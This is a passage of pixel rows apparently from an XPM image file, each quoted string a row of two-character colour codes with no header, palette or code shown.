"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.D.X.ebpbY#T.4#T#mbzbzbz#m#mauaXama9bb#X#T#X#Xa9bca3#X#n.J.0.1.2#g#d#n#o#e#d#d#d#f#o#r#K#K#K#r#o#..lbJbRbIaOah.x.S.S.H.j.yagaO.2aUbaaR#vbHakbabEbGbGaMaMaMbDaRac.oaU#p#pbz#m#mauam.hama3a9bb#Tbcaw.8.8aVaT.U.4.4.4.4aEaAaA#####Fal#A#w#w#r#.#AaA.1#d.8.waGa7.vaD.uQt.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.r.7#baCay.4.Ua3bz#p.oaUbzbz#mauambba3a9a9#Xama3amaw.R.J.1.K.3#g#g#d#e#o#f#d#f#f#o#o#K#w#K#K#K#d.ibrbRbSbLaf.k.I.G.I.j.yaObJaha0#v.n#LakakbabEbGbEaMbEaM.nbDaR.o#p#p#pbzbz#mauamamama3a9bb#Xbcaw.8a0aT.U.U.4.4.4.4aEaAaA###F#Fal#A.Z#K#f#g#Xau#d#gbcaq#4#J.M#u.uQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.C#t.AaPanaAa0a3bzbzbz#m#mbzau.h.ham.ham#Tauam.h.U.0.T.2.3.2#f#f#e#o#o#n#f#f#e#r#K#w#w.Zal#F#K.GaibNbRbJaOav.i.J.S.I.laiaObN#rbEbabGbababGbEbEaMaMbGaMbDbDaR.o#paU#pbz#m#maX.hamama9bbbb#Xbcawaw.8aVaT.UaQ.4.4.4aE#h#h##aAaAal.Z#w#K#n##aMbE#o#.a0btaSa7.v#l.uQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.saD.b.VbVaBaQa9au#maubzau#pbzaXauauau.h#XauaXa3#h.H.S.K.R#g#e#e#o#r#n#n#f#f#n#r#K#w#K#w#A#F#K.TahbNbRbJagah.j.J.K.T.i.lagbR.TacbMbDbHbababEbEaMbEbEaM.naRacaU#p#p#pbzbz#mau.hama3a9bb#X#Xbcaw.8.8aVaTaQaQ.4.4.maEaA########al.Z#K#K#KawbZ#L#r.2aQ#UaZ#qat.X.tQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.r#Ob0#5bebG.Uawam.oacbzbz#p.hauaRau.hamamauam#g.1.R#f#e#e#f#f#n#r#o#r#o#r#K#K#K#K#r#o#waE.m#w.TagbRbNbLae.l.J.K.0.H.yahaOaObcba#2aMbGbabEbGaMbE#2aM.naRac.o#p#pbzbzbzauaXamama3a9bb#X#Xbcaw.8.8a0a0.UaT.UaQ.maEaEaE#A#h#A.Z###e#d.4bGb.bM#F#.##bG#G#ibm.N.OQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t#za8#W#aaSaRaT#T.o#2bzbzbD.o#p.oaubzau.hbzbb.2.1.R#g#d#f#d#e#n#o#n#o#r#K#w#K#K#K#K#o#KaEaE#A.0afbRbRbOagah.i.0.T.I.j.jaObI#o.naM#2aMbEaMbGbEbE#2#2.nbDaR.oaU#pbzbzbz#mauam.ha3a9#X#X#Taw.8.8aVaVa0aTaQ.4.UaTaTaE#F#A#hal#K#K#o#A#T#Ua4#U.4#.#waRa#bAbga8.sQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.O#u#Sbi#ia..h.4.haMaU#pbD#2aU#maUbz#m#m#mbc.3.9.9#.#d#e#f#f#e#r#o#o#r#K#K#K#w#K#K#w.ZaEaE#F#..kbJbRbNaOagah.J.S.I.l.larbS.xa3akaM#2aMbEbGbGbE#2.nbDbDac.oaU#p#p#p#m#mau.h.hama9#X#Xbcaw.8a0aTaTaVaTaQ.4aQ.U.UaE###F###F.Z#o#o.U.nabanb1.U.2#o#mb2#Rby#t.rQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.D.dbobkbA#Gaw.8#mbDbDaRbDac.oacaUaUaU#pa0.1#.#d#g#g#f#e#n#n#r#o#r#K#K#K#K#w#w#w#w.Z#h#hal#d.ibLbRbRbIaOar.i.S.I.l.larbIaOaT#vaMaMbEbabGbabEaM.nbDbDac.oaU#pbzbz#m#mau.hamama9bb#Xbcaw.8a0aVaVaV.U.U.UaQaE#haEaQ#Fal###F#o#A.h#Ubda6b1aV.1#da3a6ao#Z#S#zQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.r.B.vbW.fblaV.4bz.naU#paR.nbD#pbz.o.oaV.K#n#o#e#e#e#o#o#o#r#K#K#w#A.Z#w.Z.Z#A.Zal#######w.R.kbObSbJbLag.i.J.G.G.i.yafbS#eaUaMakakbabGbGbGbG#2aRaRaRacaU#pbz#mbzauau.h.ha3a9a9#Tbcaw.8a0a0aT.UaTaTaQaQ.m#haE.4######.Z#o.Uak#Eb.a6#Uaw.T.9#X#Eb3a2.b.PQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.q.NbhaL.Ybw.4bc#p#paU#2bEbD#pbzacaU.4.S#n#n#n#e#e#o#r#r#K#w#K#w.Z.Z.Z.Z#Aal#A#F###Fal#w.9.ibJbRbSbJag.k.G.T.0.iaiaibR.Ia3akakbabEbGbEbEbE#2bDaRacacaUbzbzbzbzauaXamamama3a9#Xbc.8.8a0a0aTaT.UaQ.4aQaQ.m#h#F###h###o#A#pbt#E#Bb.#Uaw.0.RawaqbU#D.M.CQt.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t#z.Eb#.5bYb2aTaw#p.o#2bGaMbD.obD.o.m.S#o#r#e#f#e#r#K#K#K.Z#w.Z#A#Aal.Z#F###A####alal###K.3avbIbRbLaOai.H.S.T.i.kahbOaOaQakaMbEaMbEbGbGaM.naRaRaRac.o#pbz#m#p#mau.hamamama3#X#TawbcawawaV.U.UaQ.4.4aQ.maA.Z#FaA#A#w#TaBb.a6b.a6aB.8.K.1.8b4ax#J.6#u.#.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.t.Ca8#ybPb3b..4auaRaRaMakba.n.n.o.m.S#o#r#f#f#n#o#r#r#r.Z#w#Aalal#A.Z#F##al#h#h#Aal###w.2.xbJbRbJbLaf.l.J.G.J.J.kbObS#A.n.n#2aMbEbGbG#2bDaRaRaR.oaU#pbz#mbzauaX.hama3a9a9#T#Tawawawawa0.U.UaVaT.4aA##aAaA#h#A#n.4bEabb.#Ea6aJbua0.K.KaV.w#4#J.6#uQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#.O.C#c#8#qb5b6.4am#2aMbE#2bEakbD.4.J#n#A#r#n#e#n#w#A#w#w.Zal#F#Fal#F#F#####F#Aal###F#A.Z.RarbNbNbNbr.y.I.S.H.H.xarbI.Sbzak#2bGakbEbE#2#2.naRacacaU#mau#mbzauaX.hamama9bbbb#Xbcbc.8a0aT.UaQ.UaQaEaAaA##alaA#r#AacbQb.b.a4a4anbM##.G.1.8.w#4#J.6.CQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#.O#u#t#j#aaGbuaEa3aMakaMbGbabDaT.0#o#K#o#o#o#n#w#A#w.Z.Z#A#F#Fal###F##alal.Z.Z#F#Falal.2avbObRbSbLah.i.T.I.J.JahbL.xbcbHbEbGbabEbEaMaMbDaRaRaR.obz#m#m#mauaX.ham.hama3#T#X#T#Xbcawa0aTaQaQ.4.4.4aE#F#K#oaEaXaWab#Bbda4a6aJaW.Z.I.1.8b4bUaL.M.CQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.#.D#l#kaK#9aSbMa0aXaUakakakbDaV.K#o#K#r.Z.Z#K.Z#A.Zal#Aal#####F#F#F###F#A#K#wal#F###h#r.KaebIbObLar.y.G.I.S.H.jbrae###2bGbGbEbGbGbEaM#2.nbDaR.o#p#maubz#maXama9a9bb#X.8bcbcbcawbca0.UaQ.4.m.maEaA#F#AaTaRbta6aYa4a6a5a6a6#L#n.I.3awaqb5#Dbo.PQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.s#l#SbiaI.Q#LaTaV.nbGbHbE.8.0#n#K#o.Z.Z#K.Z#A.Z#Falal#F#F##al#F#Fal#A#w#w#Aal#####r.2avbObIbJaOai.j.S.G.I.IaOaO#naUbGbGbGbGbEbE.n#2.nbDaR.obz#m#m.o#p#maX.hama9bb#Tbc.8a0aVa0aVaVaTaT.UaEal#A.mbcaMaBabb.a4a4a4aJa6#EbG#..J.R#T#Eb3a2.b.PQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.DaD#0bsb7aZbEalbcbzbE#Lbb.1#n#w#wal#A.Z#F#Falal#Aal####alal#Falalalal#Aalal#F##al#K.Kaiagbrbrai.k.S.T.J.HafbL.2#p.z#vbEbE#2bEbDaM#2.nbD.o#p#mau.h.hama3a3amambbbb#X#Taw.8a0a0a0aT.U.4#haA.Uauakab#Bb.b.anana4aYa4abaR.1.I.Rbb#EbYbW#0#zQt.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.DaDbobybFbK.n#ha0aU#vau.9#n#K#A#F.Z#w#####F#F###F####alalalalalal.Zal#Falal#Fal#w.R.lagbObLafah.J.T.G.HaibL.Sbzb1#LbEaMaRbEbDaM.nbDbDac#pbz#maX.hama3a9a9a9bb#T#T#X#Tawa0aV.U.4#h##.m#XacbMb4b.ananaJa5ana6ana5b6#m.T.H#.a3a6#C#Z#S.qQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.r.X.Mbk#Ha.ac.4.8bDbz#f#o#o#F###Aal####aA##aA######alal#A#AalaAal###F#FaA#haA#h#A.1aibIbJaOae.k.J.J.J.kar.IaXbtbuaWbMak#LbG#2bDaRbD.o#pbzbzaU#pbz#mauaXamambc#T#Tbc.8aVaVaTaTawa3ac.zb6b.a4a6aYaYaJanbd#E#EaJb1a9.i.H#daXaJaabk#k.qQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.r#O.e#Zbv#6bzaE.haX#e#o#dal#F#A#A#F#F##aA###F#Fal#F#F#F#A#F###F####aA.m.m.maAal.9aibSbNbIagai.x.J.S.Hah.HambQbd#Eabbub1#L#2bDaRbDacaU#p#p.ha3a3a9a9a3bb#Xa9#Xbc.8a0a0.8#T.h#2aWb4#Eb.a6b.a6a5aYa6a4aJaJana6#L.8.l.i#n#m#YbV#I#c.rQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.q#Ob0apbx#G#m.8#h.3.0#f#o#A#AalaA#F.Zal#w.Z#A#Aal##aA#####A#A#w#w#K.Z#AaEaEaT#n.I.iagbIbrai.j.K.S.Jav.xa0.wbdb.b.bda6a4b6.wbZ#U.z#vbG#2ac#p#m.ha3a3a9a3a3a3aXaubzbDbaaWbQbda6a6anaJa4#E#BaJanbdaYb2ana4#EbG#o.j.i#raRa#bAbga8.DQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.t.q.Nbhbp.f#P.oaT#r.R#e#F#F.Z#A###F#w.Z#o#r.Z#A###h.m.m#F#A#F.Z.Z#w#AalaA#h#F#f#o#r.jbRbLarav.G.S.S.jahaAbZa6ana4a4a5a5bd#B#EbQb6.wbtbZbZaWbMbHakakak#vaWaWaBbZ.wab#Ba6bda4a4a4anaJa4bdb.aJaJa4a5b2anaYabac#g.H.HalaMasaN#j.7.OQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t#z.Nbhbp.Yb8ba.U.Z#w#g#d#e.Z.Z.Zal#FaA#F#A.Zalal.Z#r####aA#####Fal.Zal#w#f#f.8#m#fbIbRbr.l.x.J.G.Gae#raWa5b2anana5a4anaJaYaJana6a4ana4b.bd#B#B#B#E#Ebdb.b.b.a4ana4a4a4anaJananaJaJana4anaJanaJa4a4aJbZaw.0.i.J#h#La..c#y.B.tQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.t#z.7at#Ja1b8b1a3bzaE#A#o#w#r#K#A#A#A.Z#w#w#Aal####aAaA###F#F#A#FaA#A.Z.ZaQ#pbGaV.xbRbN.l.i.I.G.Sah#d#v.ga5a6a4aYa6a6a6aJaJa4a6a4aJa4a4a6b.b.b.bdbda6a6b.b.a6b.bd#Ba4anaJanaJaYa5a5anaJana4ana6a6a4#v#F.H.J.0.UaBazaCbhaD.uQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.t.P.E#b#5a1#PaWaM.oaV#o#g#f#w#h#F.Z#Aal##al#A#A###FaA.maE#h#h##al#o#oaV#pbDbGacaAaebNar.k.I.J.0av.RaRaJa6b.ana5ana4aJaJana4a6anaYa4a4a4a4a4anaJaJaJanana4a4a6a6a4ana4a4a4a4a4anananananana4a4a4#BaR#d.H.H.3awaqax#J.6.C.#QtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.u.O.Pa8#b#J.YasacbHbEam.4.Z.Z#w.Zalal#FaA#F.Z#r#KaA.m.U.4#h###A#KalaTac.z#2acaMam.RaebIag.i.S.S.y.2aUaJa6a6a4a5anaYa5a5aYana4anana6a4a4ananananana6b.b.bdb.b.a4aJa4a6a6a4a4b.a6ananb.a4ana4ana4b4a3.R.H.j#ga9a6aoap#0#zQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.O.Ca8atbpbxbMacbGba.obbaE#w#o#r#e#f#w#A#A.Z#F#A#A#F#A.Z#w#A#Fa0#m#2#vaMaUbDacaw#.afag.k.G.H.l.1.haYanana6aJa4aJaJana4a4a6a4a4ananana4a4a4a4anana4a6a4aJaJaYa5a4a4anaJanb.b.a4a4b.a4a6a4a4abbaaA.T.I.l#e#pbq.fby#t.rQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#.O.P.Eb0a2aZa0#m#2#vbZ#Uacam.4#A#n#r#w.Z#A#F.Z.Z#A#r#A.4#XaXacaW#2.o.nbzbz.o#paA.laraO.H.H.J.J#TaYa5aYa4aJana4a4a6a4ana4a4a4a4ana4a6a6a6a4a4aYana6ana5aYanb.a6a6a4aJaJa4a4ana4a6anb.b.a6.waU#f.Hah.xalaMbCb7.A.E.sQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.O#z.B.v#D.UbcamaRbHb1bQaW#pa3.U###w#o#f#..9#d#K#Fa0#mbE#vbEaR.oaRbDaU#pacaR.haA.IaOah.J.H.Iawa4ana4a4aYaYa4a6a4anana4a4a6a4ananananananaJa6a4anana4b.a6a6anananana4a6b.b.a4b.ana4bQabbMa0.i.lae.T.UaWbKbT#b.B.OQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.t.q.Nat#B.8a9aUaM#vaW.zb1aWakaMbDacaU#m.o.oaRbDaMbGbabG.n.o.oaR.o#m#mbz#p#maw#eahaf.l.J.Jbca6a6b.a6ana4a4ananananananananaJaJaJaJaJaJana6a6a4a6a6b.a6a6a4a4a4a4a6a4a6b.b.bda4a4#B#E.n#o.jarav.9a9#BbU#J.6#u.uQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.q.Wa7awa0.hac.n#2bG#LbH#v#v#vakakakbEbGbaaM.nbDac#pacaUacac.obz.hau#pac#paV.R.y.l.I.G.8#Bb.bda6anaJa4ana4a6ananananaYaJaJananana4a4b.b.a6b.b.b.b.b.b.b.b.b.b.a6b.bd#Bbdbd#Bbdbuaw.GavaO.I#A.na#bVby#k#z.#QtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.O.B#ba#.U#X#p.nbDbEbEbEaMbGakakakbabEaM.nacaU.o.o.o.o.o#paUbzaX.haXaUauamaw#A.3.Jav.H.Uaqb.a4b.anana4a6a6b.b.a6a4a4a4a4a4a4a4a4a6b.bdbdb.b.bdbd#B#Bbdbdbdb.bdb.bdbdbdbd#B#Eab#2#K.lagah.1.8buaZbT#y.N.sQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQt.u.CboaLbza0a9bDbDaMbG#2bDacbD#2.naMbGaMaRaUbz#maUaR#mbz.haXama9a3a3#p.ha9bbaw.m#d.x.IaE.wb.a4a6a6a4b.b.b.bdbdbdb.bdbdbdb.bdbdbd#Bb.#B#Bbdb.#B#B#B#B#E#E#E#B#E#B#Eabab#EabbQ#UaT.GaiaO.i#K.obq#Cap.b#u.tQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.ra8.AbX.Ubc#maRbDbE.naR.o.oaRbDbDbDaR.o#pauaXaubzbz#paXaXamam.h.hauama3#Ta0aT#w.0.S.4b4anaJb.ana4a6bdbdbd#B#B#B#E#B#Bb.bdbdb.b.b.#B#Bbdbd#B#E#Eab#E#E#Eab#EababbQb6#E#Eb6aR#n.laOai.KaVaBbXaIbm.E.r.#QtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.O.db0#5bDa0a3#p#2#2bEaM.nbDbD.n.n.o#paUac.oaU.oaRacaU.h.hauauaXa3bba9.ha9awbcaQ.Z.K#hbubda4#Bb.aJb.b.a6b.bdbd#B#Ebd#B#B#E#E#B#B#Bab#E#B#B#E#Eabab#Bab#Eababaqaqb6bQabaq.za0.TaeaO.x#K.o.gaoa2boaD.tQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u#z#caKbU#T#XaXacaUbD#2#2bDacacacacaUaU.o.obzbzaU#p#ma3a3.h.ha9bc#T#Xa3#XaVaV.UaE.G#F.zaq#EbQ#Bana6b.b.b.b.bd#B#B#B#E#Eab#EabbQbQab#B#B#Babababab#Eab#E#BbQaqb6b4bQbQ.waU#K.jbLah.R.8bZaF#7bm.E.r.#QtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.DaDb0#JaBaAbc#pbD#2aM#2.o#paRac#2.naRaU#pbzauau.haXama3a3a9#X#Tbc#Xa9bba0aV.8aT.9.KaVbMa4#Bbtb6ab#B#B#E#Eab#E#Bb.#EbQaqaqaqaqaqaqbQabbQaqaqaqaqaqbQaqb6b4b6b6bQabaBbH.4ahbJag.Ial.nbwa1apbo#l.tQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.##zbf.abvaV.4bbacacacbDbDbDaR#maRaR.obzbz#mauaua3.h.ha3bb#Tbcawbc#X#X#Xa0.UaT#h.Tav.3#T.zbdabbQaq#E#E#B#EbQabbd#EabbQb6aqaqb6b4aqaqaqaqaqaqbQbQaqb6bQaqbQ.wb6abbQ#U.h.Rbrbr.k#da9aq.Q#a#W.7.r.#QtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.t#l.6a2bC##.Ua9au.oaRaRaR.obz#pbz#mau#mauaXauaXaX.ha3bb#Xbcaw#T#Taw#X#Xbc.8#h.Jafbr.2awbabub6#BbQb4aqaqb4b4bQbQabaqb4aqb6b4b4aqb6b6b6b6b6b6b6b4bub6b6b4bZbt.wbt.o#narbLai.0.4bHb8#3by#S#u.t.#QtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.#.r.7#WbT.w#haTa9.oac#maubzbzbz#mau.hamama3amamama3a9#X#Taw.8a0.8a0bcawawa0##.HaibI.j#daT.oaWb.#Bb6.wbtb4b6b4aqaqb6b4b6.wbtbtaqb6b6b4b4.w.w.wbtbtbtbububtaBbMbEaA.xbLag.x#waUaY#xa7bh.B.D.#QtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.O#u#SajbxaU#AaTa3#pauau#paU.hama3.ha3amama3amamama9a3#T#X#Tawaw.8bc#T.8a0aA.iavaOaf.I#raTambG#UbQbt.wb4b6bu.wbtbtbtbtbtbtb4b6b4.wbtbtbZbZbZbZbZbZ#UbZb6aW.n.4.IaObr.k#g#X.wbKaI.abf#z.uQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.#.D.Bbh.5#4a0##.Uau#pbzaUbzama3a9a9a9a9a9a3a9a9a9#X#X#X#TawawawaVaV.U.4aQal.iahae.j.T.2al.4aV.ob1b6btbt.wbtbZbZbZbtbtbubtb6b4b4btbZbubZaBaBaBbZbZaBbubZbG#T.1afbJai.K.4#vblbV.V.b#l.O.#QtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#.u.P#caKaIb8aQ#Fa0auaU.obz.h.ha3amama3bbbb#T#Xbba9#X#X#T#T.8.8.U.UaQaEaA#e.kah.l.1#KaQ.U#h##aV#mbG#Ububtb4aBaBaBbZbububt.wbtbZbZaB#Ub1aB#UbZbZbubZbZaMaV#fahbJaf.I#A.oa5#x.5b##O.r.#QtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.s.d#0bkbvan#F.4awa9#m.oauaXa3a3a9bb#X#Xbc#Tbc#Tbcawbc.8a0aV.m.maE#h###dahav.J#w#TbDbG.namaEaEa3akb1.waqbububZbZaBb1bZbubZaBaBb1b1b1aBaBbtaBbZbubMa3#f.jbrbr.j#da9aq#V#7#jbf.P.tQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#.r#Ob0aLao#Ual##awaua3.haX.h.h.ha9#T#X#T#Tbc.8awaw#T.8aV.4aQ.4aE.4al.Tarav.2aQbGb.#Yb2abbEaQ###T.nbMb1bZ#UaWaBb1bMaW#Ub1aWaW#Ub1#Ub1bZbMaBbu#La9#n.IbLbr.y.2aVaW#sbvaj#0#l.O.#QtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.u#z.E#y.pbUaR#A.4a3a9bba9#X#Xa9bbbcbcaVa0.8aTaTaTaTaQ.m#h.maEaE.U.Z.Jav.y#ea9b6#6#4#x.Q#Qb1#TaA.UaXba.zbMaWb1bubtaBbHb1bM#Ub1aWaWaBbZ#Ub1babb#r.JahbJai.0#hbE.FaoaL.v.B.D.#QtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.O.P#c.a.cazbc#w##aVbc#Tawaw#Xbb#X#TaVaTaVaTaTaTaQ.4aE.maQaQ.8#T#w.jaf.x#KaR.gbj#7.p#9a1aH#E.o#A#KaQaubEaWb1aBaBaBbMaBbZaBb1aW.zbM#U#UbG#X#e.iagbIar.J#AaUan#4#N#W.E#z.uQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.s#l.WbsaPb9.U#e#hbc#X#Tawa0a0bca0.4aQ.4.m#haEaEaEaE.m.4.4.8bc#r.yar.J#h#v#GbF.Vbm#ja2bFaz.g#L.4#f.Za0aUak.z.zaWb1b1#U#U#U#U#UaW#LbDa0#..iaObIaf.H#r.hbQ#VaIaK#t.C.O.#QtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.D.dbobkbv#saT.9##.m.8#Xa0a0aw.8.8a0aT.maE#h.m.maQ.4.m.m.8aV.9arar.0aTaB.Q#N#W#kbf.6#IbTbjb8.wa3#e#fal#XaRba#L#LbHbH.zbMb1aBbGbz.m.RahbLbJar.H#nbbbt#6#Haj.baD.sQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.D#O.va2.Yb8a9#e#o#haVbcaVawa0aT.U.4aAaAaA.m.maQaQaE.ma0aQ.1arah.2bb#B#x#D.6.d#z.d.Wbm.5.faFa6#2.4#e#KaEaV.haMbH#LbHbHbaac.8.Z.3avbIbJae.I#nbbaBas.fbW.e.B.r.uQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.r.Eb#aLaobCac.9#d#h.UaTbc.8a0a0aT.m#h#h.maE.maEal#FaE.Z.xag.k#nbz.g#Raj.W#z.t.s#ua8bh#ZaP#4.FbMa9.Z.9.9#r#h#Xa3#Xa0aE#K.1.kbrbIbrav.S#Ka9bZas.Y#Dbh.N.q.uQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t#za8#ya7bY.Lba#e#r#FaE.4.4.UaTaQaEaAaAaE#h.maE#A#A#h.Z.xaf.HalbEb8b7.a.E.DQt.#.O#z#Obobg#NaoasbQaRaT#r.2.1.0.3.1.G.laiagbIbrar.i.3#F#mb4#G#RaLat.E.P.tQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
